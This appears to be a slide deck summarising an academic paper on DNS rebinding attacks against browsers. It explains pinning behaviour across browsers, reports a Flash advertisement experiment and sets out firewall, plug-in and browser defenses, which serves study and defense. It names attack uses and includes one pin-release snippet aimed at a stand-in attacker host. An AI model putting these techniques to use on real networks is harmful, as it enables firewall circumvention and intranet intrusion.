1. Protecting Browsers from DNS
Rebinding Attacks
Collin Jackson , Adam Barth, Andrew Bortz,
Weidong Shao, Dan Boneh
Felipe Mattosinho
2. Outline
Introduction
How DNS Rebinding Works
DNS Rebinding Vulnerabilities
Attacks using DNS Rebinding
Defenses Against Rebinding
Related Work
3. Introduction
Browsers and DNS Caching
Why Browsers cache the DNS?
Different browsers have different policies mechanism to
cache. E.g : Firefox, Safari, Internet Explorer
TTL hold the valid time of a dns entry
Browsers „should“ cache until TTL expires
4. Introduction
Browsers Same Origin Policy
Browser attempts to stop client-side script from different origin
The policy applies to network access and browser state such as the DOM
interface, cookies, cache, history, and the password database
Same origin means same protocol, domain name and port number
Examples:
Wikipedia, http://en.wikipedia.org/wiki/Same_origin_policy
5. Introduction
Browsers Same Origin Policy
Access Within same origin: Plug-ins such as Flash Player
and Java can access network sockets directly.
Access between different origins: Flash Player permits its
movies to read back HTTP responses with a XML policy.
Prohibited Access:
Internet Explorer 7: Firefox 2: Safari 2:
FTP 21 , SMTP 25, FTP 21 , SMTP 25, Ports are not
POP3 110, NNTP 119 POP3 110, NNTP 119 blocked
IMAP 143 IMAP 143
+ 51 additional ports
6. How DNS Rebinding Works
Bob www.SE-ROCKS.com
Win a car
www.badguy.com
ISP
Malicious
Javascript www.badguy.com :
IP: 1.2.3.4 TTL 2s
Alice
7. How DNS Rebinding Works
Bob IP: 10.1.1.2
Javascript
// Reconnect to
www.badguy.com
after 2s
www.badguy.com
: IP 10.1.1.3
Alice IP: 10.1.1.3
8. DNS Rebinding Vulnerabilities
Standard Rebinding Vulnerabilities
Multiple A Records
Multiple IP Address resolves to the same host.
In 1996, the first attack aimed to confuse the security policy of the JVM.
A Java applet, connects target and attacker web server.
Time-Varying DNS
In 2001, the original attack on Java was extended, this time using JavaScript.
www.badguy.com is bound to a very short TTL.
After rebinding www.badguy.com to the target IP Address, the XMLHttpRequest object
connects to www.badguy.com that resolves to the target’s server.
9. DNS Rebinding Vulnerabilities
Standard Rebinding Vulnerabilities
Pinning in Current Browsers
Browser pins host name to IP Address.
Internet Explorer 7, binds a host to an IP for 30 minutes by default. With Multiple A
records, the browser can try different IP addresses within 1 sec.
Internet Explorer 6 also pins for 30 minutes. The pin can be easily released with the
following html command <img src:http://badguy.com:81/>
FireFox 1.5 and 2 caches DNS entries between 60 to 120 seconds
Opera 9 has the same behavior as Internet Explorer 6, however holds a pin for 12
minutes.
Safari 2 pins DNS bindings for 1 second.
10. DNS Rebinding Vulnerabilities
Standard Rebinding Vulnerabilities
Flash Player 9
Flash player is installed on 55.8% of web browsers( as of December 2006), according to
Adobe. The experiments however showed 86.9%.
Flash opens a port less then 1024 with www.badguy.com. Then flash automatically
sends <policy-file-request />. The attacker will respond with the following XML:
[JBB+07]
11. Attacks using DNS Rebinding
Attacks
Firewall Circumvention
Spidering the Intranet
Compromising unpatched machines
Abusing internal open services
IP Hijacking
Committing Click Fraud
Sending Spam
Defeating IP-based Authentication
Framing clients
12. Attacks using DNS Rebinding
Experiment: Recruiting Browsers
DNS Rebinding was tested running a Flash Player 9 advertisement
Two machines ran during three successive nights.
The attacker ran:
1. A custom authoritative DNS server
2. A custom Flash player policy server
3. An Apache Web server hosting the advertisement
The target ran an Apache Server to log successful attacks
13. Attacks using DNS Rebinding
Experiment: Recruiting Browsers
The attack needed no user click
The attack results:
[JBB+07]
[JBB+07]
14. Attacks using DNS Rebinding
Experiment: Recruiting Browsers
Relevant numbers about the attack:
1. 50,951 impressions from 44,924 unique IP address were acquired
(40.2% IE7,32.3% IE6, 23.5% Firefox, 4% Other).
2. The rebinding experiment ran on the 44,301(86.9%) impressions
that reported Flash Player 9.
3. The experiment was successful on 30,636(60.1%) impressions and
27,840 unique IP addresses.
4. The attack was less successfull on Mac Os.
15. Defenses Against Rebinding
Fixing Firewall Circumvention
Enterprise
Blocking outbound traffic on port 53, a DNS server can be configured to not bound
external names to internal IP Addresses.
Use of dnswall to enforce policy.
Consumer
Consumer firewalls already expose a caching DNS resolver and can be augmented
with dnswall.
Software
E.g. : Windows Firewall can block DNS resolutions to 127.*.*.*, protecting services that
bind to the loopback interface.
16. Defenses Against Rebinding
Fixing Plug-ins
Flash Player
A policy based only if obtained for the same IP address and same host name.
Requesting policy before opening sockets to any port.
Java
The connect method is used to obtain a proxied socket connection to an external
machine
Java LiveConnect
Removing multi-pin vulnerabilities by using the same cache as the browser.
17. Defenses Against Rebinding
Fixing Browsers (Default-Deny Sockets)
Checking Host Header
Accepting only expected Host headers.
Finer-grained Origins
Refine origin by adding information such as the server IP address or a public key.
IP Addresses: It is robust however some applications may fail such as Gmail.
Public Keys: Can lead to a problem that two HTTPS pages served from the same
domain to read each other’s state.
18. Defenses Against Rebinding
Fixing Browsers (Default-Deny Sockets)
Smarter Pinning
Robustness X Security
Extending the width of pins. E.g. An IP 171.64.78.10 to 171.64.78.
The developers of the NoScript for Firefox are planning this pinning heuristic
19. Defenses Against Rebinding
Fixing Browsers(Default-Deny Sockets)
Policy-based Pinning
Browsers consult server-supplied policies to determine when it is safe to re-pin.
Pinning Pitfalls
Common Pin Database: Sharing the same database
Cache:Browser’s cache and all plug-in caches must be modified to prevent rebinding
attacks.
Document.domain
20. Defenses Against Rebinding
Fixing Browsers(Default-Allow Sockets)
Host Name Authorization
„Honest Machines“ do not advertise host name controlled by attackers.
[JBB+07]
Policy mechanism steps:
1. Resolve the host name auth.ip.in-addr.arpa
2. Does the host name exists?
3. If IP is policy-enabled resolve the host name www.example.com.auth.ip.in-
addr.arpa
4. Determine if the host name is authorized
21. Related Work
Using Browsers as Bots
Can be used for distributed denial of service attack
Sender Policy Framework
Stores policy information in DNS
22. References
[1] Adobe. Adobe Player Penetration.
http://www.adobe.com/products/player_census/flashplayer
[2] Dan Kaminisky.Black ops 2007, designing reviewing the
web. PowerPoint.
www.doxpara.com/slides/DMK_BO2K7_Web.ppt
[3] Wikipedia
http://en.wikipedia.org/wiki/Domain_Name_System
[4] Google Safe Browsing for Firefox, 2005
http://www.google.com/tools/firefox/safebrowsing
[5] J. Ruderman. JavaScript Security:Same origin.
http://www.mozilla.org/projects/security/components/same-
origin.html
Supervisor: Gert Pfeifer [6]D. Ross Notes on DNS pinning
http://blogs.msdn.com/dross/archive/2007/07/09/notes-on-
dns.pinning.aspx, 2007